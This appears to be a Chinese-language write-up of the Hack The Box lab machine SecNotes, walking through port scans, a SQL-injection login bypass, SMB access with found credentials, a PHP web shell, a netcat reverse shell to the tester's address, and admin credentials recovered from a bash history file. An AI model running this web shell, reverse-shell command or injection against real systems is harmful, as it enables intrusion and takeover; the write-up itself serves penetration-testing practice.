1、扫描
445开了说明可能有smb登录,8808有http
C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.97
Discovered open port 8808/tcp on 10.10.10.97
Discovered open port 80/tcp on 10.10.10.97
^Zte: 0.00-kpps, 100.00% done, waiting -22-secs, found=3
[1]+ Stopped masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.97 -p445,8808,80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-12 09:48 CST
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m09s, median: -1s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2021-02-11T17:48:43-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-12T01:48:45
|_ start_date: N/A
2、注入 & smb渗透
8808
注册,进入。但是中规中矩没啥用
注册时用注入 test' or 1=1-- -
再登录,就可以看到新东西了,明显的smb登录信息。把这个10.10.10.97 secnotes.htb
加到本机/etc/hosts
进入smbsmbclient //secnotes.htb/new-site -U "tyler"
,输入密码92g!mA8BGjOirkL%OG*&
ls查看发现就是网页里iis的默认图片。说明往里面传什么,网页就相应有什么。
那么根据套路 一般iis传asp aspx之类,但是都没用,再试试传cmd.php put cmd.php
。试whoami成功显示
cmd.php里的内容
<?php echo shell_exec($_GET['cmd']); ?>
接着传nc put nc.exe
进去,弹shell
多次执行都弹不回shell。
最终上传nc64位 加 用curl才管用
curl "http://10.10.10.97:8808/cmd.php?cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443"
3、提权
在用户桌面发现bash这一linux才用的东西,很奇怪
全靶机搜bash.exe
where /R C:\ bash.exe
第二个可用
跟linux操作一样的了,变ttypython -c 'import pty;pty.spawn("/bin/bash")'
查看隐藏文件,发现历史,打开看cat .bash_history
发现admin的账号密码,administrator%u6!4ZwgwOM#^OBf#Nwnh
用impacket包https://github.com/SecureAuthCorp/impacket
里的psexec.py直接登录psexec.py administrator@10.10.10.97
拿下。